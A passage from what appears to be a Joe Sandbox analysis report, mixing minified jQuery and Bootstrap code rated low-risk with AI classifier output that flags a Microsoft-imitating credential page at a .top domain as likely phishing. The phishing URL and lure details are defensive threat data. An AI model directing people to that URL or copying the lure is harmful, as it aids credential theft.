b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d |
| URL: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is well-structured and does not exhibit any suspicious behavior. Overall, this is a low-risk script that is commonly used for legitimate web development purposes."
} |
/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?i[j.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b||this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Obj |
| URL: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the Bootstrap JavaScript library, which is a widely-used and trusted open-source front-end framework. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. It is primarily focused on providing functionality for common UI components and interactions, which is consistent with the expected behavior of the Bootstrap library. There are no signs of obfuscation or suspicious activities, and the code is well-documented and licensed under MIT. Overall, this is a low-risk script that is commonly used in legitimate web development projects."
} |
/*!
* Bootstrap v4.1.3 (https://getbootstrap.com/)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enumerable}))),e.forEach(function(t){var e,n,i;e=r,i=o[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return r}e=e&&e.hasOwnProperty("default")?e.default:e,h=h&&h.hasOwnProperty("default")?h.default:h;var r,n,o,a,c,u,f,d,g,_,m,p,v,y,E,C,T,b,S,I,A,D,w,N,O,k,P,j,H,L,R,x,W,U,q,F,K,M,Q,B,V,Y,z,J,Z,G,$,X,tt,et,nt,it,rt,ot,st,at,lt,ct,ht,ut,ft,dt,gt,_t,mt,pt,vt,yt,Et,Ct,Tt,bt,St,It,At,Dt,wt,Nt,Ot,kt,Pt,jt,Ht,Lt,Rt,xt,Wt,Ut,qt,Ft,Kt,Mt,Qt,Bt,Vt,Yt,zt,Jt,Zt,Gt,$t,Xt,te,ee,ne,ie,re,oe,se,ae,le,ce,he,ue,fe,de,ge,_e,me,pe,ve,ye,Ee,Ce,Te,be,Se,Ie,Ae,De,we,Ne,Oe,ke,Pe,je,He,Le,Re,xe,We,Ue,qe,Fe,Ke,Me,Qe,Be,Ve,Ye,ze,Je,Ze,Ge,$e,Xe,tn,en,nn,rn,on,sn,an,ln,cn,hn,un,fn,dn,gn,_n,mn,pn,vn,yn,En,Cn,Tn,bn,Sn,In,An,Dn,wn,Nn,On,kn,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transition-duration");return parseFloat(e)?(e=e.split(",")[0],1e3*parseFloat(e)):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){i(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var r=n[i],o=e[i],s=o&&l.isElement(o)?"element":(a=o,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(r).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+r+'".')}var a}};return i.fn.emulateTransitionEnd=t,i.event.special[l.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(i(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest("."+f)[0]),n},t._triggerCloseEvent=function(t){var e=r.Event(u.CLOSE);return r(t).trigger(e),e},t._removeElement=function(e){var n=this;if(r(e).removeClass(g),r(e).hasClass(d)){var t=Fn.getTransitionDurationFromElement(e);r(e).one(Fn.TRANSITION_END,function(t){return |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script is a part of the Bootstrap library, a widely used and reputable front-end framework. It does not exhibit any high-risk behaviors such as dynamic code execution or data exfiltration. The script primarily involves DOM manipulation and event handling, which are typical for UI libraries. There are no interactions with untrusted domains or obfuscated code present."
} |
/*!
* Bootstrap v4.0.0 (https://getbootstrap.com)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProperty("default")?n.default:n;var o,a,l,h,c,u,f,d,_,g,p,m,v,E,T,y,C,I,A,b,D,S,w,N,O,k,P=function(t){var e=!1;function n(e){var n=this,s=!1;return t(this).one(i.TRANSITION_END,function(){s=!0}),setTimeout(function(){s||i.triggerTransitionEnd(n)},e),this}var i={TRANSITION_END:"bsTransitionEnd",getUID:function(t){do{t+=~~(1e6*Math.random())}while(document.getElementById(t));return t},getSelectorFromElement:function(e){var n,i=e.getAttribute("data-target");i&&"#"!==i||(i=e.getAttribute("href")||""),"#"===i.charAt(0)&&(n=i,i=n="function"==typeof t.escapeSelector?t.escapeSelector(n).substr(1):n.replace(/(:|\.|\[|\]|,|=|@)/g,"\\$1"));try{return t(document).find(i).length>0?i:null}catch(t){return null}},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toString.call(l).match(/\s([a-zA-Z]+)/)[1].toLowerCase());if(!new RegExp(r).test(a))throw new Error(t.toUpperCase()+': Option "'+s+'" provided type "'+a+'" but expected type "'+r+'".')}var l}};return e=("undefined"==typeof window||!window.QUnit)&&{end:"transitionend"},t.fn.emulateTransitionEnd=n,i.supportsTransitionEnd()&&(t.event.special[i.TRANSITION_END]={bindType:e.end,delegateType:e.end,handle:function(e){if(t(e.target).is(this))return e.handleObj.handler.apply(this,arguments)}}),i}(e),L=(a="alert",h="."+(l="bs.alert"),c=(o=e).fn[a],u={CLOSE:"close"+h,CLOSED:"closed"+h,CLICK_DATA_API:"click"+h+".data-api"},f="alert",d="fade",_="show",g=function(){function t(t){this._element=t}var e=t.prototype;return e.close=function(t){t=t||this._element;var e=this._getRootElement(t);this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},e.dispose=function(){o.removeData(this._element,l),this._element=null},e._getRootElement=function(t){var e=P.getSelectorFromElement(t),n=!1;return e&&(n=o(e)[0]),n||(n=o(t).closest("."+f)[0]),n},e._triggerCloseEvent=function(t){var e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyElement=function(t){o(t).detach().trigger(u.CLOSED).remove()},t._jQueryInterface=function(e){return this.each(function(){var n=o(this),i=n.data(l);i||(i=new t(this),n.data(l,i)),"close"===e&&i[e](this)})},t._handleDismiss=function(t){return function(e){e&&e.preventDefault(),t.close(this)}},s(t,null,[{key:"VERSION",get:function(){return"4.0.0"}}]),t}(),o(document).on(u.CLICK_DATA_API,'[data-dismiss="alert"]',g._handleDismiss(new g)),o.fn[a]=g._jQueryInterface,o.fn[a].Constructor=g,o.fn[a].noConflict=function(){return o.fn[a]=c,g._jQueryInterface},g),R=(m="button",E="."+(v="bs.button |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The URL 'dcvnewsyr1.dcrdcoveris.top' does not match the legitimate domain 'microsoft.com'.", "The domain 'dcrdcoveris.top' is not associated with Microsoft.", "The use of a top-level domain '.top' is unusual for a well-known brand like Microsoft.", "The subdomain 'dcvnewsyr1' and the main domain 'dcrdcoveris' do not have any known association with Microsoft.", "The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information, which is common in phishing sites." ], "riskscore": 9}
Google indexed: False |
URL: dcvnewsyr1.dcrdcoveris.top
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We couldn't find an account with that username. Try another account.",
"prominent_button_name": "next",
"text_input_field_labels": [
"noway@hotmail.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
Acrobat.exe (PID: 2452 cmdline: 
AcroCEF.exe (PID: 4188 cmdline: 
chrome.exe (PID: 7584 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node